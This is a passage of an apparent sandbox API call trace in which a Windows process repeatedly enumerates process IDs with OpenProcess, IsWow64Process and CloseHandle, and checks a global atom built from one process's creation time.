	[0082.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3bc
	[0082.006] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.006] CloseHandle (hObject=0x3bc) returned 1
	[0082.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3bc
	[0082.006] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.006] CloseHandle (hObject=0x3bc) returned 1
	[0082.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0082.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3bc
	[0082.006] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.006] CloseHandle (hObject=0x3bc) returned 1
	[0082.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3bc
	[0082.007] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.007] CloseHandle (hObject=0x3bc) returned 1
	[0082.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3bc
	[0082.007] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.007] CloseHandle (hObject=0x3bc) returned 1
	[0082.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0082.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3bc
	[0082.007] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.007] CloseHandle (hObject=0x3bc) returned 1
	[0082.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3bc
	[0082.007] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.007] CloseHandle (hObject=0x3bc) returned 1
	[0082.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3bc
	[0082.007] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.007] CloseHandle (hObject=0x3bc) returned 1
	[0082.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3bc
	[0082.008] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.008] CloseHandle (hObject=0x3bc) returned 1
	[0082.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3bc
	[0082.008] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.008] CloseHandle (hObject=0x3bc) returned 1
	[0082.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3bc
	[0082.008] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.008] CloseHandle (hObject=0x3bc) returned 1
	[0082.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3bc
	[0082.008] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.008] CloseHandle (hObject=0x3bc) returned 1
	[0082.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3bc
	[0082.008] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.008] CloseHandle (hObject=0x3bc) returned 1
	[0082.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3bc
	[0082.008] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.008] CloseHandle (hObject=0x3bc) returned 1
	[0082.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3bc
	[0082.008] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.009] CloseHandle (hObject=0x3bc) returned 1
	[0082.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3bc
	[0082.009] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.009] CloseHandle (hObject=0x3bc) returned 1
	[0082.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3bc
	[0082.009] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.009] CloseHandle (hObject=0x3bc) returned 1
	[0082.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3bc
	[0082.009] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.009] CloseHandle (hObject=0x3bc) returned 1
	[0082.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3bc
	[0082.009] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.009] CloseHandle (hObject=0x3bc) returned 1
	[0082.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3bc
	[0082.009] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.009] CloseHandle (hObject=0x3bc) returned 1
	[0082.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3bc
	[0082.010] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.010] CloseHandle (hObject=0x3bc) returned 1
	[0082.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3bc
	[0082.010] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.010] CloseHandle (hObject=0x3bc) returned 1
	[0082.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3bc
	[0082.010] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.010] CloseHandle (hObject=0x3bc) returned 1
	[0082.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3bc
	[0082.010] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.010] CloseHandle (hObject=0x3bc) returned 1
	[0082.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0082.010] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.010] CloseHandle (hObject=0x3bc) returned 1
	[0082.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0082.011] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.011] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0082.011] GetProcessTimes (in: hProcess=0x3bc, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0082.011] wsprintfA (in: param_1=0x752448, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0082.011] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.011] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0082.011] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.012] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0082.012] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0082.012] CloseHandle (hObject=0x3bc) returned 1
	[0082.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0082.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0082.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3bc
	[0082.012] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.012] CloseHandle (hObject=0x3bc) returned 1
	[0082.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0082.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0082.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0082.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0082.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0082.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0082.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0082.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0082.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0082.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0082.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0082.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0082.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0082.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0082.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0082.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0082.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0082.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0082.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3bc
	[0082.079] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.079] CloseHandle (hObject=0x3bc) returned 1
	[0082.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0082.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0082.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3bc
	[0082.080] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.080] CloseHandle (hObject=0x3bc) returned 1
	[0082.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0082.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3bc
	[0082.080] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.080] CloseHandle (hObject=0x3bc) returned 1
	[0082.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3bc
	[0082.080] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.080] CloseHandle (hObject=0x3bc) returned 1
	[0082.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3bc
	[0082.080] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.080] CloseHandle (hObject=0x3bc) returned 1
	[0082.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3bc
	[0082.080] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.081] CloseHandle (hObject=0x3bc) returned 1
	[0082.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3bc
	[0082.081] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.081] CloseHandle (hObject=0x3bc) returned 1
	[0082.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3bc
	[0082.081] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.081] CloseHandle (hObject=0x3bc) returned 1
	[0082.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0082.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3bc
	[0082.081] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.081] CloseHandle (hObject=0x3bc) returned 1
	[0082.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3bc
	[0082.081] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.081] CloseHandle (hObject=0x3bc) returned 1
	[0082.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3bc
	[0082.081] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.081] CloseHandle (hObject=0x3bc) returned 1
	[0082.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0082.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3bc
	[0082.082] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.082] CloseHandle (hObject=0x3bc) returned 1
	[0082.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3bc
	[0082.082] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.082] CloseHandle (hObject=0x3bc) returned 1
	[0082.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3bc
	[0082.082] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.082] CloseHandle (hObject=0x3bc) returned 1
	[0082.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3bc
	[0082.082] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.082] CloseHandle (hObject=0x3bc) returned 1
	[0082.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3bc
	[0082.082] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.082] CloseHandle (hObject=0x3bc) returned 1
	[0082.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3bc
	[0082.083] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.083] CloseHandle (hObject=0x3bc) returned 1
	[0082.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3bc
	[0082.083] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.083] CloseHandle (hObject=0x3bc) returned 1
	[0082.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3bc
	[0082.083] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.083] CloseHandle (hObject=0x3bc) returned 1
	[0082.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3bc
	[0082.083] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.083] CloseHandle (hObject=0x3bc) returned 1
	[0082.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3bc
	[0082.083] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.083] CloseHandle (hObject=0x3bc) returned 1
	[0082.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3bc
	[0082.083] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.083] CloseHandle (hObject=0x3bc) returned 1
	[0082.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3bc
	[0082.083] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.083] CloseHandle (hObject=0x3bc) returned 1
	[0082.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3bc
	[0082.084] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.084] CloseHandle (hObject=0x3bc) returned 1
	[0082.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3bc
	[0082.084] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.084] CloseHandle (hObject=0x3bc) returned 1
	[0082.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3bc
	[0082.084] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.084] CloseHandle (hObject=0x3bc) returned 1
	[0082.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3bc
	[0082.084] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.084] CloseHandle (hObject=0x3bc) returned 1
	[0082.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3bc
	[0082.084] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.084] CloseHandle (hObject=0x3bc) returned 1
	[0082.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3bc
	[0082.084] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.085] CloseHandle (hObject=0x3bc) returned 1
	[0082.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3bc
	[0082.085] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.085] CloseHandle (hObject=0x3bc) returned 1
	[0082.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0082.085] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.085] CloseHandle (hObject=0x3bc) returned 1
	[0082.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0082.085] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.085] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0082.085] GetProcessTimes (in: hProcess=0x3bc, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0082.085] wsprintfA (in: param_1=0x752448, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0082.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.086] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0082.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.086] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0082.086] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0082.086] CloseHandle (hObject=0x3bc) returned 1
	[0082.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0082.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0082.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3bc
	[0082.086] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.087] CloseHandle (hObject=0x3bc) returned 1
	[0082.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0082.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0082.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0082.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0082.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0082.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0082.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0082.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0082.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0082.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0082.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0082.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0082.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0082.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0082.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0082.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0082.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0082.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0082.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3bc
	[0082.153] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.153] CloseHandle (hObject=0x3bc) returned 1
	[0082.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0082.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0082.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3bc
	[0082.154] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.154] CloseHandle (hObject=0x3bc) returned 1
	[0082.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0082.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3bc
	[0082.154] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.154] CloseHandle (hObject=0x3bc) returned 1
	[0082.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3bc
	[0082.154] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.154] CloseHandle (hObject=0x3bc) returned 1
	[0082.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3bc
	[0082.154] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.154] CloseHandle (hObject=0x3bc) returned 1
	[0082.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3bc
	[0082.154] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.154] CloseHandle (hObject=0x3bc) returned 1
	[0082.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3bc
	[0082.155] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.155] CloseHandle (hObject=0x3bc) returned 1
	[0082.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3bc
	[0082.155] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.155] CloseHandle (hObject=0x3bc) returned 1
	[0082.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0082.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3bc
	[0082.155] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.155] CloseHandle (hObject=0x3bc) returned 1
	[0082.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3bc
	[0082.155] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.155] CloseHandle (hObject=0x3bc) returned 1
	[0082.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3bc
	[0082.155] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.155] CloseHandle (hObject=0x3bc) returned 1
	[0082.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0082.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3bc
	[0082.156] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.156] CloseHandle (hObject=0x3bc) returned 1
	[0082.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3bc
